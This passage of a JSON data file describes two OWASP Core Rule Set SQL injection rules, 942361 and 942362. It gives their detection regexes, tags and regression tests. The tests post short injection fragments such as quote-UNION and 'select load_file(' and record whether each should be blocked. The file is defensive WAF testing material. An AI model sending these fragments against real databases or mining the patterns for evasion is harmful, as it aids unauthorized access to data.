"/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "\" ALTER A" }, "expected": { "should_block": true, "rule_ids": [ 942361 ] }, "malicious_patterns": [ { "location": "post_body", "value": "\" ALTER A" } ] }, { "description": "Detects basic SQL injection based on keyword alter or union", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "'ALTER A" }, "expected": { "should_block": true, "rule_ids": [ 942361 ] }, "malicious_patterns": [ { "location": "post_body", "value": "'ALTER A" } ] }, { "description": "Detects basic SQL injection based on keyword alter or union", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "' alter/" }, "expected": { "should_block": true, "rule_ids": [ 942361 ] }, "malicious_patterns": [ { "location": "post_body", "value": "' alter/" } ] }, { "description": "Detects basic SQL injection based on keyword alter or union", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "\" UNION A" }, "expected": { "should_block": true, "rule_ids": [ 942361 ] }, "malicious_patterns": [ { "location": "post_body", "value": "\" UNION A" } ] }, { "description": "Detects basic SQL injection based on keyword alter or union", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "'UNION A" }, "expected": { "should_block": true, "rule_ids": [ 942361 ] }, "malicious_patterns": [ { "location": "post_body", "value": "'UNION A" } ] }, { "description": "Detects basic SQL injection based on keyword alter or union", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "' union/" }, "expected": { "should_block": true, "rule_ids": [ 942361 ] }, "malicious_patterns": [ { "location": "post_body", "value": "' union/" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1029, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i:^[\\W\\d]+\\s*?(?:alter|union)\\b)", "actions": [ { "act_name": "id", "lineno": 1030, "act_quote": "no_quote", "act_arg": "942361", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1031, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1032, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1033, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1034, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1034, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1035, "act_quote": "quotes", "act_arg": "Detects basic SQL injection based on keyword alter or union", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1036, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1037, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1038, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1039, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1040, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1041, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1042, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1043, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1044, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1045, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1046, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1047, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1048, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1029 } }, { "rule_id": "942362", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)(?:alter|(?:(?:cre|trunc|upd)at|renam)e|de(?:lete|sc)|(?:inser|selec)t|load)[\\s\\x0b]+(?:char|group_concat|load_file)[\\s\\x0b]?\\(?|end[\\s\\x0b]*?\\);|[\\s\\x0b\\(]load_file[\\s\\x0b]*?\\(|[\\\"'`][\\s\\x0b]+regexp[^0-9A-Z_a-z]|[^A-Z_a-z][\\s\\x0b]+as\\b[\\s\\x0b]*[\\\"'0-9A-Z_-z]+[\\s\\x0b]*\\bfrom|^[^A-Z_a-z]+[\\s\\x0b]*?(?:create[\\s\\x0b]+[0-9A-Z_a-z]+|(?:d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load|(?:renam|truncat)e|u(?:pdate|nion[\\s\\x0b]*(?:all|(?:sele|distin)ct))|alter[\\s\\x0b]*(?:a(?:(?:ggregat|pplication[\\s\\x0b]*rol)e|s(?:sembl|ymmetric[\\s\\x0b]*ke)y|u(?:dit|thorization)|vailability[\\s\\x0b]*group)|b(?:roker[\\s\\x0b]*priority|ufferpool)|c(?:ertificate|luster|o(?:l(?:latio|um)|nversio)n|r(?:edential|yptographic[\\s\\x0b]*provider))|d(?:atabase|efault|i(?:mension|skgroup)|omain)|e(?:(?:ndpoi|ve)nt|xte(?:nsion|rnal))|f(?:lashback|oreign|u(?:lltext|nction))|hi(?:erarchy|stogram)|group|in(?:dex(?:type)?|memory|stance)|java|l(?:a(?:ngua|r)ge|ibrary|o(?:ckdown|g(?:file[\\s\\x0b]*group|in)))|m(?:a(?:s(?:k|ter[\\s\\x0b]*key)|terialized)|e(?:ssage[\\s\\x0b]*type|thod)|odule)|(?:nicknam|queu)e|o(?:perator|utline)|p(?:a(?:ckage|rtition)|ermission|ro(?:cedur|fil)e)|r(?:e(?:mot|sourc)e|o(?:l(?:e|lback)|ute))|s(?:chema|e(?:arch|curity|rv(?:er|ice)|quence|ssion)|y(?:mmetric[\\s\\x0b]*key|nonym)|togroup)|t(?:able(?:space)?|ext|hreshold|r(?:igger|usted)|ype)|us(?:age|er)|view|w(?:ork(?:load)?|rapper)|x(?:ml[\\s\\x0b]*schema|srobject)))\\b)", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects concatenated basic SQL injection and SQLLFI attempts", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "concatenated basic SQL injection and SQLLFI", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "select Char(" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": "select Char(" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SELECT CHAR(" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SELECT CHAR(" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SELECT GROUP_CONCAT(" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SELECT GROUP_CONCAT(" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SELECT group_cOnCat(" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SELECT group_cOnCat(" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": ") as cc FROM" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": ") as cc FROM" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": ") AS orders FROM" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": ") AS orders FROM" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": ") AS `carrier_id` from" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": ") AS `carrier_id` from" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "select load_file(" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": "select load_file(" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": ") AS Role FROM" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": ") AS Role FROM" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "` AS `edit_user_id` from" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": "` AS `edit_user_id` from" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 12, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": ") AS val FROM" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": ") AS val FROM" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 13, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=%60+REGEXP%20" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=%60+REGEXP%20" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 14, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": ") AS 'Durchschnitt_Importzeit' FROM" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": ") AS 'Durchschnitt_Importzeit' FROM" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 15, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "` AS `OXTIMESTAMP` from" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": "` AS `OXTIMESTAMP` from" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 16, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": ") as col_0_0_ from" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": ") as col_0_0_ from" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 17, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": ") AS `count` FROM" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": ") AS `count` FROM" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 18, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": ") AS schlagwoerter FROM" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": ") AS schlagwoerter FROM" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 19, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": ") as User from" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": ") as User from" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 20, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": ") AS t FROM" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": ") AS t FROM" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 21, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "(load_file(" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": "(load_file(" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 22, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": ") as ExecuteTheseSQLCommands FROM" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": ") as ExecuteTheseSQLCommands FROM" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 23, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": ") AS schlagwoerter FROM" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": ") AS schlagwoerter FROM" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 24, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "` AS `documentType` FROM" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": "` AS `documentType` FROM" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 25, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "! As' from" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": "! As' from" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 26, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "; As not from" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": "; As not from" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 27, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SELECT load_file(" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SELECT load_file(" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 28, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "6 As\" from" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": "6 As\" from" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 29, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": ") as day1 FROM" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": ") as day1 FROM" } ] }, { "description": "GH issue 1580", "test_id": 30, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": ", aside from" }, "expected": { "should_block": false, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": ", aside from" } ] }, { "description": "GH issue 1605", "test_id": 31, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "a=/create" }, "expected": { "should_block": false, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=/create" } ] }, { "description": "GH issue 1605", "test_id": 32, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "a=/CREATE TABLE Persons" }, "expected": { "should_block": true, "rule_ids": [ 942362 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=/CREATE TABLE Persons" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1059, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)(?:alter|(?:(?:cre|trunc|upd)at|renam)e|de(?:lete|sc)|(?:inser|selec)t|load)[\\s\\x0b]+(?:char|group_concat|load_file)[\\s\\x0b]?\\(?|end[\\s\\x0b]*?\\);|[\\s\\x0b\\(]load_file[\\s\\x0b]*?\\(|[\\\"'`][\\s\\x0b]+regexp[^0-9A-Z_a-z]|[^A-Z_a-z][\\s\\x0b]+as\\b[\\s\\x0b]*[\\\"'0-9A-Z_-z]+[\\s\\x0b]*\\bfrom|^[^A-Z_a-z]+[\\s\\x0b]*?(?:create[\\s\\x0b]+[0-9A-Z_a-z]+|(?:d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load|(?:renam|truncat)e|u(?:pdate|nion[\\s\\x0b]*(?:all|(?:sele|distin)ct))|alter[\\s\\x0b]*(?:a(?:(?:ggregat|pplication[\\s\\x0b]*rol)e|s(?:sembl|ymmetric[\\s\\x0b]*ke)y|u(?:dit|thorization)|vailability[\\s\\x0b]*group)|b(?:roker[\\s\\x0b]*priority|ufferpool)|c(?:ertificate|luster|o(?:l(?:latio|um)|nversio)n|r(?:edential|yptographic[\\s\\x0b]*provider))|d(?:atabase|efault|i(?:mension|skgroup)|omain)|e(?:(?:ndpoi|ve)nt|xte(?:nsion|rnal))|f(?:lashback|oreign|u(?:lltext|nction))|hi(?:erarchy|stogram)|group|in(?:dex(?:type)?|memory|stance)|java|l(?:a(?:ngua|r)ge|ibrary|o(?:ckdown|g(?:file[\\s\\x0b]*group|in)))|m(?:a(?:s(?:k|ter[\\s\\x0b]*key)|terialized)|e(?:ssage[\\s\\x0b]*type|thod)|odule)|(?:nicknam|queu)e|o(?:perator|utline)|p(?:a(?:ckage|rtition)|ermission|ro(?:cedur|fil)e)|r(?:e(?:mot|sourc)e|o(?:l(?:e|lback)|ute))|s(?:chema|e(?:arch|curity|rv(?:er|ice)|quence|ssion)|y(?:mmetric[\\s\\x0b]*key|nonym)|togroup)|t(?:able(?:space)?|ext|hreshold|r(?:igger|usted)|ype)|us(?:age|er)|view|w(?:ork(?:load)?|rapper)|x(?:ml[\\s\\x0b]*schema|srobject)))\\b)", "actions": [ { "act_name": "id", "lineno": 1060, "act_quote": "no_quote", "act_arg": "942362", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1061, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1062, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1063, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1064, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1064, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1065, "act_quote": "quotes", "act_arg": "Detects concatenated basic SQL injection and SQLLFI attempts", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1066, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1067, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1068, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1069, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1070, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1071, "act_quote": "quotes", "act_arg": "paranoia-level/2", 